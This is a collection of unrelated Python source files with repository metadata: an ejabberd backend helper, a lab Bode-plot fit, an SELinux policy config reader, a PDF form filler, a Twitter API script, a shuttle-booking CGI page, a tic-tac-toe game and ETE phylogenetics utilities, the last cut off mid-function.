"""Not yet implemented."""
pass
def check_email(self, username, domain, email):
"""Not yet implemented."""
pass
def parse_connection_string(self, connection):
"""Parse string as returned by the ``connected_users_info`` or ``user_sessions_info`` API calls.
>>> EjabberdBackendBase().parse_connection_string('c2s_tls')
(0, True, False)
>>> EjabberdBackendBase().parse_connection_string('c2s_compressed_tls')
(0, True, True)
>>> EjabberdBackendBase().parse_connection_string('http_bind')
(2, None, None)
:param connection: The connection string as returned by the ejabberd APIs.
:type connection: str
        :return: A tuple representing the connection type, if it is encrypted and if it uses XMPP stream
compression.
:rtype: tuple
"""
# TODO: Websockets, HTTP Polling
if connection == 'c2s_tls':
return CONNECTION_XMPP, True, False
elif connection == 'c2s_compressed_tls':
return CONNECTION_XMPP, True, True
elif connection == 'http_bind':
return CONNECTION_HTTP_BINDING, None, None
elif connection == 'c2s':
return CONNECTION_XMPP, False, False
log.warn('Could not parse connection string "%s"', connection)
return CONNECTION_UNKNOWN, True, True
def parse_ip_address(self, ip_address):
"""Parse an address as returned by the ``connected_users_info`` or ``user_sessions_info`` API calls.
Example::
>>> EjabberdBackendBase().parse_ip_address('192.168.0.1') # doctest: +FORCE_TEXT
IPv4Address('192.168.0.1')
>>> EjabberdBackendBase().parse_ip_address('::FFFF:192.168.0.1') # doctest: +FORCE_TEXT
IPv4Address('192.168.0.1')
>>> EjabberdBackendBase().parse_ip_address('::1') # doctest: +FORCE_TEXT
IPv6Address('::1')
:param ip_address: An IP address.
:type ip_address: str
:return: The parsed IP address.
:rtype: `ipaddress.IPv6Address` or `ipaddress.IPv4Address`.
"""
if ip_address.startswith('::FFFF:'):
ip_address = ip_address[7:]
return ipaddress.ip_address(ip_address)
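# Minimal subclass sketch (an illustration, not part of the original module):
# a dummy backend that implements just get_api_version() to show how the
# api_version caching and minimum-version check in XmppBackendBase behave.
class _DummyBackend(EjabberdBackendBase):
    def get_api_version(self):
        # pretend the server reported ejabberd 16.01
        return self.parse_version_string('16.01')
if __name__ == '__main__':
    backend = _DummyBackend()
    print(backend.api_version)                  # (16, 1), cached afterwards
    print(len(backend.get_random_password()))   # 32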
|
mathiasertl/xmpp-backends
|
xmpp_backends/base.py
|
Python
|
gpl-3.0
| 21,732
|
import uncertainties
from uncertainties import ufloat
import math
import numpy
import pylab
from scipy.optimize import curve_fit
import scipy.stats
#The values are measured by hand with the multimeter and then written into the data file; the phase-shift column may be left empty
def linear(x, a, b):
return a*x+b
def fitPassaBasso(x, f_0):
    # note: Python's ^ is bitwise XOR, so the exponent must be written with **
    return 1/pylab.sqrt(1/(1+(x/f_0)**2))
Vout_o, dVout_o, f_o, df_o = pylab.loadtxt('/home/federico/Laboratorio3/relazione2/datiPassaBasso.txt', unpack=True)
#Neglect the output resistance of the function generator, so that V_in is roughly constant.
Vin = 5.0 #maximum amplitude, measured once and for all
dVin = 0.15
A_o = Vout_o/Vin
dA_o = A_o *pow(((dVout_o/Vout_o)**2 + (dVin/Vin)**2), 0.5)
B_o = 20 * pylab.log10(A_o)
dB_o = 8.7*dA_o/A_o
logf_o = pylab.log10(f_o)
dlogf_o = (1/pylab.log(10))*df_o/f_o
print(dlogf_o)
print(dB_o)
pylab.figure(1)
pylab.title('Bode diagram of low-pass RC filter')
pylab.xlabel('frequency [kHz]')
pylab.ylabel('gain [dB]')
pylab.ylim(-50, 2)
pylab.xlim(1, 7)
pylab.grid(color = "gray")
pylab.grid(color = "gray")
pylab.errorbar(logf_o, B_o, dB_o, dlogf_o, "o", color="black")
init = numpy.array([0.0, 0.0])
par_o, cov_o = curve_fit(linear, logf_o, B_o, init, pylab.sqrt(dB_o*dB_o+20.0*dlogf_o*dlogf_o))
print(par_o, cov_o)
chisq = (((B_o - linear(logf_o, par_o[0], par_o[1]))/(pylab.sqrt(dB_o*dB_o+20.0*dlogf_o*dlogf_o)))**2).sum() #residuals compare the measured gain B_o to the model
ndof = len(logf_o) - 2 #subtract the two parameters extracted from the fit
p=1.0-scipy.stats.chi2.cdf(chisq, ndof)
print("Chisquare/ndof = %f/%d" % (chisq, ndof))
print("p = ", p)
#Routine to draw the fitted line:
div = 1000
bucket = numpy.array([0.0 for i in range(div)])
retta = numpy.array([0.0 for i in range(div)])
inc = 6.0/div #float division, so this also works under Python 2
for i in range(len(bucket)):
bucket[i]=float(i)*inc
retta[i] = linear(bucket[i], par_o[0], par_o[1])
pylab.plot(bucket, retta, color = "red")
pylab.show()
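# Sanity check on the fit (a general expectation, not a measured result): well
# above the cutoff a first-order low-pass rolls off at -20 dB/decade, so the
# fitted slope par_o[0] should come out close to -20 when the measured points
# lie in the stop band.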
|
fedebell/Laboratorio3
|
relazione2/scriptVecchi/bode.py
|
Python
|
gpl-3.0
| 1,939
|
# (C) Copyright 2016 Vit Mojzis, vmojzis@redhat.com
#
# This program is distributed under the terms of the GNU General Public License
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sepolicyanalysis.domain_grouping as grouping
import sys
# read "security_related.conf" and return corresponding types
# returns (domain_types, resource_types)
def get_security_types():
try:
packages = set()
types = set()
exclude = set()
txt = open("/etc/sepolicyanalysis/security_related.conf", "r")
packages = {}
for line in txt:
if (len(line) < 1) or (line[0] == '#'):
continue
if line.startswith("packages="):
packages = set([x.strip() for x in line[9:].split(",")])
if line.startswith("types=="):
types = set([x.strip() for x in line[6:].split(",")])
if line.startswith("exclude="):
exclude = set([x.strip() for x in line[8:].split(",")])
#all types given in "types=" are treated as domains !
domain_grouping = grouping.group_types_cil()
groups = set()
for name in packages:
group = domain_grouping.get(name, None)
if group:
groups.add(group)
#get types corresponding to given packages
domains, resources = grouping.get_types(groups)
domains = domains | types
# remove excluded types
domains = domains - exclude
resources = resources - exclude
return domains, resources
except IOError as e:
print('Could not read "security_related.conf"!', file=sys.stderr)
return set(), set()
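# Illustrative /etc/sepolicyanalysis/security_related.conf (layout inferred
# from the parser above, not a file shipped with the project):
#   # packages whose domains/resources are security related
#   packages=openssh, sudo
#   # extra types, always treated as domains
#   types=sshd_t
#   # types to exclude from both result sets
#   exclude=var_log_t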
|
vmojzis/sepolicy_analysis
|
sepolicyanalysis/security_related.py
|
Python
|
gpl-3.0
| 2,061
|
#!/usr/bin/python3
# Install:
# * python3-pdfrw
import os
from pdfrw import PdfWriter, PdfReader, IndirectPdfDict, PdfName, PdfDict,PdfObject
INVOICE_TEMPLATE_PATH = 'templates/9_FP_GM_I_GS_AUTOBIS.pdf' # template (base) document
INVOICE_OUTPUT_PATH = 'invoice.pdf' # output document
ANNOT_KEY = '/Annots'
ANNOT_FIELD_KEY = '/T'
ANNOT_VAL_KEY = '/V'
ANNOT_RECT_KEY = '/Rect'
SUBTYPE_KEY = '/Subtype'
WIDGET_SUBTYPE_KEY = '/Widget'
def write_fillable_pdf(input_pdf_path, output_pdf_path, data_dict):
template_pdf = PdfReader(input_pdf_path)
    # so that the filled-in fields are actually displayed
template_pdf.Root.AcroForm.update(PdfDict(NeedAppearances=PdfObject('true')))
for page in template_pdf.pages:
annotations = page[ANNOT_KEY]
for annotation in annotations:
if annotation[SUBTYPE_KEY] == WIDGET_SUBTYPE_KEY:
if annotation[ANNOT_FIELD_KEY]:
key = annotation[ANNOT_FIELD_KEY][1:-1]
if key in data_dict.keys():
                        #HACK FOR THE CHECKBOXES - save the template by hand with the desired checkboxes set; here, skip checkbox fields so they stay unchanged
if key=="untitled6" or key=="untitled21" or key=="untitled22" or key=="untitled23" or key=="untitled24" or key=="untitled25" :
continue
#this depends on page orientation
rct = annotation.Rect
                        height = round(float(rct[3]) - float(rct[1]), 2)
                        width = round(float(rct[2]) - float(rct[0]), 2)
xobj = PdfDict(
                            BBox = [0, 0, width, height],
FormType = 1,
Resources = PdfDict(ProcSet = [PdfName.PDF, PdfName.Text]),
Subtype = PdfName.Form,
Type = PdfName.XObject
)
#assign a stream to it
xobj.stream = '''/Tx BMC
BT
/Helvetica 8.0 Tf
1.0 5.0 Td
0 g
(''' + data_dict[key] + ''') Tj
ET EMC'''
annotation.update(PdfDict(AP=PdfDict(N = xobj),V='{}'.format(data_dict[key])))
#annotation.update(pdfrw.PdfDict(V='{}'.format(data_dict[key]),AP='{}'.format(data_dict[key])))
PdfWriter().write(output_pdf_path, template_pdf)
data_dict = {
    'untitled1': '46017675', # school code
    'untitled5': 'IES La Sènia', # school name
    'untitled6': PdfName('Yes'), # publicly-run school
    'untitled2': 'Paiporta', # school town
    'untitled4': 'Valencia', # school province
    'untitled8': '961 20 59 55', # school phone number
    'untitled3': 'Calle Escultor José Capuz, 96', # school address
    'untitled9': '46200', # school postal code
    'untitled10': 'NIA', # student NIA
    'untitled11': 'Curso', # student year
    'untitled12': 'Apellidos, Nombre', # student surname, first name
    'untitled15': 'Desarrollo de Aplicaciones Web', # programme title
    'untitled16': 'Superior', # programme level
    'untitled18': 'Punto 1.1', # item 1.1
    'untitled17': 'Punto 1.2', # item 1.2
    'untitled19': 'Punto 1.3', # item 1.3
    'untitled20': 'Punto 1.4', # item 1.4
    'untitled21': 'true', # checkbox: advanced
    'untitled22': 'false', # checkbox: intermediate
    'untitled23': 'false', # checkbox: basic
    'untitled24': 'false', # checkbox: not passed
    'untitled25': 'Punto 2.1', # item 2.1
    'untitled26': 'Punto 2.2', # item 2.2
    'untitled27': 'Punto 2.3', # item 2.3
    'untitled28': 'Punto 2.4', # item 2.4
    'untitled30': 'Paiporta', # signature: place
    'untitled31': '28', # signature: day
    'untitled32': 'Mayo' # signature: month
}
if __name__ == '__main__':
write_fillable_pdf(INVOICE_TEMPLATE_PATH, INVOICE_OUTPUT_PATH, data_dict)
print(" * Rellenado ")
|
aberlanas/senia-cdd
|
tools/rellenarFormularioFP.py
|
Python
|
gpl-3.0
| 3,975
|
# -*- coding: utf-8 -*-#
"""
Basic Twitter Authentication
requirements: Python 2.5+ tweepy (easy_install tweepy | pip install tweepy)
"""
__author__ = 'Bernie Hogan'
__version__= '1.0'
import string
import codecs
import os
import pickle
import copy
import sys
import json
import webbrowser
import tweepy
from tweepy import Cursor
import twitterhelpers as th
def getFollowerCount(api, screen_name="BarackObama"):
user = api.get_user(screen_name)
return user.followers_count
def getFollowingCount(api, screen_name="BarackObama"):
user = api.get_user(screen_name)
print user
print dir(user)
return user.friends_count
if __name__=='__main__':
CONSUMER_KEY = th.CONSUMER_KEY
CONSUMER_SECRET = th.CONSUMER_SECRET
auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
ACCESS_TOKEN_SECRET = th.ACCESS_TOKEN_SECRET
ACCESS_TOKEN = th.ACCESS_TOKEN
auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)
api = tweepy.API(auth)
print "Now you have received an access token."
print "Or rather, your account has authorized this application to use the twitter api."
print "You have this many hits to the API left this hour: "
# print json.dumps(api.rate_limit_status(), indent = 1) #['remaining_hits']
print getFollowerCount(api, "blurky")
print getFollowingCount(api, "blurky")
|
oxfordinternetinstitute/scriptingcourse
|
DSR-Week 2/wk02_twitter_test.py
|
Python
|
gpl-3.0
| 1,313
|
#!/usr/bin/env python
"""list all previously made bookings"""
import os
import sys
import cgi
import datetime
import json
import shuttle
import shconstants
import smtplib
import shcookie
print "Content-type: text/html\r\n"
shuttle.do_login(shcookie.u, shcookie.p)
form = cgi.FieldStorage()
if 'action' in form:
act = form.getvalue("action")
if act == "cancel":
id = form.getvalue("id")
shuttle.cancel_booking(id)
show_all_routes = 'ar' in form
bookings = shuttle.get_bookings()
print '''<html>
<head>
<title>Connector bookings for %s</title>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" />
<link href="style.css" rel="stylesheet" />
</head>
<body>''' % (shcookie.u)
alldata = json.load(open("all.json"))
routes = [r[:-3] for r in alldata["true"].keys()]
routes.sort()
routes = [[r, alldata["true"][r + " AM"][2]] for r in routes if len(shcookie.routes) == 0 or show_all_routes or alldata["true"][r + " AM"][2] in shcookie.routes]
# header bar
print '<div id="newbar"><div id="newbarin">'
for r in routes:
print '''<span class="newbutton">
<a href="new.py?r=%s" class="l">%s</a>
</span>''' % (r[1], r[0])
if len(shcookie.routes) != 0 and not show_all_routes:
print '''<span class="newbutton"><a href="bookings.py?ar=1" class="l">all routes</a></span>'''
print '</div></div>'
# list of rides
if 'cal' in form:
cal = form.getvalue("cal")
print '''<div id="outlook">
<a href="outlook.py?cal=%s">download booked trip</a>
</div>''' % (cal)
print '<div id="bookings">'
for b in bookings:
past = False
dt = datetime.datetime.strptime(b['dd'] + ' ' + b['dt'], "%m/%d/%Y %I:%M %p")
if dt < datetime.datetime.now() - datetime.timedelta(hours=2) - datetime.timedelta(minutes=60):
continue
if "PM" in b['dt']:
csspm = " pm"
else:
csspm = ""
if dt < datetime.datetime.now() - datetime.timedelta(hours=2) - datetime.timedelta(minutes=1):
past = True
csspm += " past"
print '''<div class="booking%s">
<span class="t">%s</span>
<span class="r">%s</span>
<span class="dt">%s</span><span class="dl">%s</span>
<span class="gt">%s</span><span class="gl">%s</span>''' % (
csspm, dt.strftime("%A, %b %d"), b['r'], b['dt'], b['dl'], b['gt'], b['gl'])
if 'cn' in b:
print ' <span class="cn">Connector %s</span>' % (b['cn'])
if not past:
loc = shuttle.get_shuttle_location(b['r'], b['cn'])
            if loc is not None:
stop = shuttle.get_stop_gps(b['r'], b['dl'])
                if stop is not None:
dst = shuttle.get_maps_eta((loc['lat'], loc['lon']), (stop[0], stop[1]))
print ' <span class="et">ETA: %s (<a href="https://www.google.com/maps?q=%f,%f">%s</a>)</span>' % (
dst[1], loc['lat'], loc['lon'], dst[0])
if 'cl' in b:
print ''' <form method="post" action="%s" onsubmit="return confirm('Cancel?');">
<input type="hidden" name="action" value="cancel"/>
<input type="hidden" name="id" value="%s"/>
<input type="submit" value="cancel"/>
</form>''' % (os.environ["SCRIPT_NAME"], b['cl'])
print '</div>'
print '</div></body><!--'
# print datetime.datetime.now().strftime('%Y/%m/%d %H:%M:%S')
print '--></html>'
|
christianholz/QuickShuttle
|
bookings.py
|
Python
|
gpl-3.0
| 3,213
|
import random
import os
# TicTacToe
def createNewField():
result = []
for i in range(3):
tmp = []
for i2 in range(3):
tmp.append(' ')
result.append(tmp)
return result
def printField(field):
print ''
for element in field:
print element
print ''
def isFieldFull(field):
occupiedPlaces = 0
for row in field:
for place in row:
if place != ' ':
occupiedPlaces += 1
elif place == ' ':
return False
if occupiedPlaces == 9:
return True
def KI_Turn(field):
fieldStatus = isFieldFull(field)
if fieldStatus == True:
return field
result = field
running = True
"It is the turn of the computer."
while running == True:
row = random.randint(0,2)
column = random.randint(0,2)
if field[row][column] == ' ':
result[row][column] = 'O'
running = False
else:
pass
return result
def USER_Turn(field):
fieldStatus = isFieldFull(field)
if fieldStatus == True:
return field
result = field
running = True
print "User it's your turn"
while running == True:
row = int(raw_input('Which row? '))
column = int(raw_input('Which column? '))
if field[row][column] == ' ':
result[row][column] = 'X'
running = False
else:
print 'This place is occupied!'
return result
def Winner(field):
winner = ''
for row in field:
if row == ['X','X','X']:
winner = 'User'
return winner
elif row == ['O','O','O']:
winner = 'Computer'
return winner
else:
winner = ''
columns = [[],[],[]]
for row in field:
columns[0].append(row[0])
columns[1].append(row[1])
columns[2].append(row[2])
for col in columns:
if col == ['X','X','X']:
winner = 'User'
return winner
elif col == ['O','O','O']:
winner = 'Computer'
return winner
else:
winner = ''
dia1 = [field[0][0],field[1][1],field[2][2]]
dia2 = [field[0][2],field[1][1],field[2][0]]
if dia1 == ['X','X','X'] or dia2 == ['X','X','X']:
winner = 'User'
return winner
elif dia1 == ['O','O','O'] or dia2 == ['O','O','O']:
winner = 'Computer'
return winner
else:
winner = ''
fieldStatus = isFieldFull(field)
if fieldStatus == True:
return "Nobody"
return winner
# Time to play!
userScore = 0
computerScore = 0
answer = ''
while answer != 'q':
print 'User: ' + str(userScore)
print 'Computer: ' + str(computerScore)
print 'Press q to exit or anything else to continue'
answer = raw_input(': ')
if answer == 'q':
break
os.system('clear')
field = createNewField()
win = Winner(field)
turn = 0
while win == '':
if win == 'Nobody':
print 'There is no winner.'
break
turn += 1
print 'Turn: ' + str(turn)
printField(field)
field = USER_Turn(field)
win = Winner(field)
if win == 'User':
break
os.system('clear')
turn += 1
print 'Turn: ' + str(turn)
printField(field)
field = KI_Turn(field)
win = Winner(field)
if win == 'Computer':
break
os.system('clear')
printField(field)
print 'The winner is: ' + win
if win == 'User':
userScore += (10-turn)
elif win == 'Computer':
computerScore += (10-turn)
print "User: " + str(userScore)
print "Computer: " + str(computerScore)
|
dodonator/ticTacToe
|
outdatet/ticTacToe.py
|
Python
|
gpl-3.0
| 3,105
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import print_function
# #START_LICENSE###########################################################
#
#
# This file is part of the Environment for Tree Exploration program
# (ETE). http://etetoolkit.org
#
# ETE is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ETE is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
# License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ETE. If not, see <http://www.gnu.org/licenses/>.
#
#
# ABOUT THE ETE PACKAGE
# =====================
#
# ETE is distributed under the GPL copyleft license (2008-2015).
#
# If you make use of ETE in published work, please cite:
#
# Jaime Huerta-Cepas, Joaquin Dopazo and Toni Gabaldon.
# ETE: a python Environment for Tree Exploration. BMC
# Bioinformatics 2010, 11:24. doi:10.1186/1471-2105-11-24.
#
# Note that extra references to the specific methods implemented in
# the toolkit may be available in the documentation.
#
# More info at http://etetoolkit.org. Contact: huerta@embl.de
#
#
# #END_LICENSE#############################################################
import sys
from os import kill
from os.path import join as pjoin
from os.path import split as psplit
from os.path import exists as pexist
import os
import socket
import string
from .getch import Getch
import random
import hashlib
import logging
import time
import datetime
import re
import shutil
from glob import glob
import six
from six.moves import range
from six.moves import input
try:
import numpy
except ImportError:
import math
def _mean(nums):
return float(sum(nums)) / len(nums)
def _std(nums):
avg = _mean(nums)
variance = [(x - avg)**2 for x in nums]
std = math.sqrt(_mean(variance))
return std
def _median(nums):
nums.sort()
size = len(nums)
midPos = size // 2
if size % 2 == 0:
median = (nums[midPos] + nums[midPos-1]) / 2.0
else:
median = nums[midPos]
return median
_max = max
_min = min
else:
_std = numpy.std
_max = numpy.max
_min = numpy.min
_mean = numpy.mean
_median = numpy.median
log = logging.getLogger("main")
DEBUG = lambda: log.level <= 10
hascontent = lambda f: pexist(f) and os.path.getsize(f) > 0
GLOBALS = {
"running_jobs": set(), # Keeps a list of jobs consuming cpu
"cached_status": {}, # Saves job and task statuses by id to be
# used them within the same get_status cycle
}
class _DataTypes(object):
def __init__(self):
self.msf = 100
self.alg_fasta = 200
self.alg_phylip = 201
self.alg_nt_fasta = 202
self.alg_nt_phylip = 203
self.clean_alg_fasta = 225
self.clean_alg_phylip = 226
self.kept_alg_columns = 230
self.concat_alg_fasta = 250
self.concat_alg_phylip = 251
self.alg_stats = 260
self.alg_list = 290
self.best_model = 300
self.model_ranking = 305
self.model_partitions = 325
self.tree = 400
self.tree_stats = 410
self.constrain_tree = 425
self.constrain_alg = 426
self.cogs = 500
self.cog_analysis = 550
self.job = 1
self.task = 2
DATATYPES = _DataTypes()
ETE_CITE =u"""Huerta-Cepas J, Dopazo J, Gabaldón T. ETE: a python
Environment for Tree Exploration. BMC Bioinformatics. 2010 Jan
13;11:24."""
PHYML_CITE = u"""Guindon S, Dufayard JF, Lefort V, Anisimova M, Hordijk W, Gascuel O.
New algorithms and methods to estimate maximum-likelihood phylogenies:
assessing the performance of PhyML 3.0. Syst Biol. 2010
May;59(3):307-21."""
FASTTREE_CITE = u"""Price MN, Dehal PS, Arkin AP. FastTree 2 -
approximately maximum-likelihood trees for large alignments. PLoS
One. 2010 Mar 10;5(3):e9490."""
RAXML_CITE = u"""Stamatakis A. RAxML version 8: a tool for phylogenetic analysis and
post-analysis of large phylogenies Bioinformatics (2014) 30 (9): 1312-1313."""
MAFFT_CITE = u"""Katoh K, Kuma K, Toh H, Miyata T. MAFFT version 5:
improvement in accuracy of multiple sequence alignment. Nucleic Acids
Res. 2005 Jan 20;33(2):511-8."""
TRIMAL_CITE = u"""Capella-Gutiérrez S, Silla-Martínez JM, Gabaldón T.
trimAl: a tool for automated alignment trimming in large-scale
phylogenetic analyses. Bioinformatics. 2009 Aug 1;25(15):1972-3."""
MUSCLE_CITE = u"""Edgar RC. MUSCLE: multiple sequence alignment with
high accuracy and high throughput.", Nucleic Acids Res. 2004 Mar
19;32(5):1792-7."""
CLUSTALO_CITE = u""" Sievers F, Wilm A, Dineen D, Gibson TJ, Karplus
K, Li W, Lopez R, McWilliam H, Remmert M, Söding J, Thompson JD,
Higgins DG. Fast, scalable generation of high-quality protein
multiple sequence alignments using Clustal Omega. Mol Syst Biol. 2011
Oct 11;7:539. doi: 10.1038/msb.2011.75."""
DIALIGN_CITE = u"""Subramanian AR, Kaufmann M, Morgenstern B.
DIALIGN-TX: greedy and progressive approaches for segment-based
multiple sequence alignment. Algorithms Mol Biol. 2008 May 27;3:6."""
MCOFFEE_CITE = u"""Wallace IM, O'Sullivan O, Higgins DG, Notredame C.
M-Coffee: combining multiple sequence alignment methods with T-Coffee.
Nucleic Acids Res. 2006 Mar 23;34(6):1692-9. """
JMODELTEST_CITE = u"""Darriba D, Taboada GL, Doallo R, Posada
D. jModelTest 2: more models, new heuristics and parallel computing.Nat
Methods. 2012 Jul 30;9(8):772."""
try:
from collections import OrderedDict
except ImportError:
from ete3.tools.phylobuild_lib.ordereddict import OrderedDict
# ete3 should be added to the python path by the npr script
from ete3.phylo import PhyloTree
from ete3.coretype.tree import Tree
from ete3.coretype.seqgroup import SeqGroup
from ete3.parser.fasta import read_fasta
from ete3.coretype import tree
from ete3.ncbi_taxonomy import ncbiquery as ncbi
# These default values in trees are very important for the outgroup
# selection algorithm to work:
tree.DEFAULT_SUPPORT = 1.0
tree.DEFAULT_DIST = 1.0
#from ete3.treeview import drawer
#drawer.GUI_TIMEOUT = 1
TIME_FORMAT = '%a %b %d %H:%M:%S %Y'
AA = set('ACEDGFIHKMLNQPSRTWVY*-.UOBZJX') | set('acedgfihkmlnqpsrtwvyuobzjx')
NT = set("ACGT*-.URYKMSWBDHVN") | set("acgturykmswbdhvn")
GAP_CHARS = set(".-")
GENCODE = {
'ATA':'I', 'ATC':'I', 'ATT':'I', 'ATG':'M',
'ACA':'T', 'ACC':'T', 'ACG':'T', 'ACT':'T',
'AAC':'N', 'AAT':'N', 'AAA':'K', 'AAG':'K',
'AGC':'S', 'AGT':'S', 'AGA':'R', 'AGG':'R',
'CTA':'L', 'CTC':'L', 'CTG':'L', 'CTT':'L',
'CCA':'P', 'CCC':'P', 'CCG':'P', 'CCT':'P',
'CAC':'H', 'CAT':'H', 'CAA':'Q', 'CAG':'Q',
'CGA':'R', 'CGC':'R', 'CGG':'R', 'CGT':'R',
'GTA':'V', 'GTC':'V', 'GTG':'V', 'GTT':'V',
'GCA':'A', 'GCC':'A', 'GCG':'A', 'GCT':'A',
'GAC':'D', 'GAT':'D', 'GAA':'E', 'GAG':'E',
'GGA':'G', 'GGC':'G', 'GGG':'G', 'GGT':'G',
'TCA':'S', 'TCC':'S', 'TCG':'S', 'TCT':'S',
'TTC':'F', 'TTT':'F', 'TTA':'L', 'TTG':'L',
'TAC':'Y', 'TAT':'Y', 'TAA':'*', 'TAG':'*',
'TGC':'C', 'TGT':'C', 'TGA':'*', 'TGG':'W',
'---': '-',
}
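# Editor's sketch (not part of the original module): a minimal helper showing
# how GENCODE can be used; unknown or partial codons fall back to 'X'.
def translate_cds(seq):
    """Translate a nucleotide coding sequence codon-by-codon using GENCODE."""
    seq = seq.upper()
    return ''.join(GENCODE.get(seq[i:i + 3], 'X')
                   for i in range(0, len(seq) - 2, 3))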
# Aux functions (general)
md5 = lambda x: hashlib.md5(x).hexdigest()
encode_seqname = lambda x: md5(x)[:10]
basename = lambda path: psplit(path)[-1]
# Aux functions (task specific)
get_raxml_mem = lambda taxa,sites: (taxa-2) * sites * (80 * 8) * 9.3132e-10
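# Note: get_raxml_mem appears to return an estimate in GB: (taxa-2) * sites
# likelihood vectors of 80 doubles (80 * 8 bytes), scaled by 9.3132e-10 ~ 1/2**30.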
del_gaps = lambda seq: seq.replace("-","").replace(".", "")
random_string = lambda N: ''.join(random.choice(string.ascii_uppercase +
string.digits) for x in range(N))
generate_id = lambda items: md5(','.join(sorted(items)))
generate_runid = lambda: md5(str(time.time()*random.random()))
HOSTNAME = socket.gethostname()
def tobool(value):
return str(value).lower() in set(["1", "true", "yes"])
def rpath(fullpath):
'Returns relative path of a task file (if possible)'
m = re.search("/(tasks/.+)", fullpath)
if m:
return m.groups()[0]
else:
return fullpath
def ask(string, valid_values, default=-1, case_sensitive=False):
""" Asks for a keyborad answer """
v = None
if not case_sensitive:
valid_values = [value.lower() for value in valid_values]
while v not in valid_values:
v = input("%s [%s]" % (string,','.join(valid_values) ))
if v == '' and default>=0:
v = valid_values[default]
if not case_sensitive:
v = v.lower()
return v
def generate_node_ids(target_seqs, out_seqs):
cladeid = generate_id(target_seqs)
nodeid = md5(','.join([cladeid, generate_id(out_seqs)]))
return nodeid, cladeid
def merge_arg_dicts(source, target, parent=""):
for k,v in six.iteritems(source):
if not k.startswith("_"):
if k not in target:
target[k] = v
else:
log.warning("%s: [%s] argument cannot be manually set",
parent,k)
return target
def load_node_size(n):
if n.is_leaf():
size = 1
else:
size = 0
for ch in n.children:
size += load_node_size(ch)
n.add_feature("_size", size)
return size
def render_tree(tree, fname):
# Generates tree snapshot
npr_nodestyle = NodeStyle()
npr_nodestyle["fgcolor"] = "red"
for n in tree.traverse():
if hasattr(n, "nodeid"):
n.set_style(npr_nodestyle)
ts = TreeStyle()
ts.show_leaf_name = True
ts.show_branch_length = True
ts.show_branch_support = True
ts.mode = "r"
iterface = faces.TextFace("iter")
ts.legend.add_face(iterface, 0)
tree.dist = 0
tree.sort_descendants()
tree.render(fname, tree_style=ts, w=700)
def sec2time(secs):
return str(datetime.timedelta(seconds=secs))
def read_time_file(fname):
INFO_TIME = open(fname)
try:
l1 = INFO_TIME.readline().strip()
l1 = l1.replace("CEST", "") # TEMP FIX
l1 = l1.replace("EDT", "") # TEMP FIX
start = time.mktime(time.strptime(l1, TIME_FORMAT))
except Exception as e:
start = ""
log.warning("execution time: %s", e)
try:
l2 = INFO_TIME.readline().strip()
l2 = l2.replace("CEST", "") # TEMP FIX
l2 = l2.replace("EDT", "") # TEMP FIX
end = time.mktime(time.strptime(l2, TIME_FORMAT))
except Exception as e:
end = ""
log.warning("execution time: %s", e)
INFO_TIME.close()
return start, end
def dict_string(dictionary, ident = '', braces=1):
""" Recursively prints nested dictionaries."""
text = []
for key in sorted(dictionary.keys()):
value = dictionary[key]
if isinstance(value, dict):
text.append('%s%s%s%s' %(ident,braces*'[',key,braces*']'))
text.append('\n')
text.append(dict_string(value, ident+' ', braces+1))
else:
if isinstance(value, set) or isinstance(value, frozenset):
value = sorted(value)
text.append(ident+'%s = %s' %(key, value))
text.append('\n')
return ''.join(text)
def checksum(*fnames):
block_size=2**20
hash = hashlib.md5()
for fname in fnames:
f = open(fname, "rb")
while True:
data = f.read(block_size)
if not data:
break
hash.update(data)
f.close()
return hash.hexdigest()
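# e.g. checksum("a.fa", "b.fa") returns a single md5 over both files read in
# order (1 MB blocks), so changing either file, or their order, changes the digest.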
def pid_up(pid):
""" Check For the existence of a unix pid. """
try:
kill(int(pid), 0)
except OSError:
return False
else:
return True
def clear_tempdir():
base_dir = GLOBALS.get("basedir", None)
out_dir = GLOBALS["output_dir"]
scratch_dir = GLOBALS.get("scratch_dir", GLOBALS.get("dbdir", base_dir))
if base_dir and base_dir != out_dir:
try:
log.log(20, "Copying new db files to output directory %s..." %out_dir)
if not pexist(out_dir):
os.makedirs(out_dir)
if os.system("cp -a %s/* %s/" %(scratch_dir, out_dir)):
log.error("Could not copy data from scratch directory!")
log.log(20, "Deleting temp directory %s..." %scratch_dir)
except Exception as e:
print(e)
log.error("Could not copy data from scratch directory!")
pass
# By all means, try to remove temp data
try: shutil.rmtree(scratch_dir)
except OSError: pass
def terminate_job_launcher():
back_launcher = GLOBALS.get("_background_scheduler", None)
if back_launcher:
#GLOBALS['_job_queue'].close()
GLOBALS['_job_queue'].cancel_join_thread()
back_launcher.join(120) # gives a couple of minutes to finish
back_launcher.terminate()
def print_as_table(rows, header=None, fields=None, print_header=True, stdout=sys.stdout):
""" Print >>Stdout, a list matrix as a formated table. row must be a list of
dicts or lists."""
if header is None:
header = []
def _str(i):
if isinstance(i, float):
return "%0.2f" %i
else:
return str(i)
def _safe_len(i):
        return len(re.sub(r'\033\[\d+m', '', _str(i)))
def _safe_rjust(s, just):
return (" " * (just - _safe_len(s))) + s
vtype = None
for v in rows:
        if vtype is not None and type(v) != vtype:
raise ValueError("Mixed row types in input")
else:
vtype = type(v)
lengths = {}
if vtype == list or vtype == tuple:
v_len = len(fields) if fields else len(rows[0])
if header and len(header)!=v_len:
raise Exception("Bad header length")
# Get max size of each field
if not fields:
fields = list(range(v_len))
for i,iv in enumerate(fields):
header_length = 0
if header != []:
#header_length = len(_str(header[i]))
header_length = _safe_len(header[i])
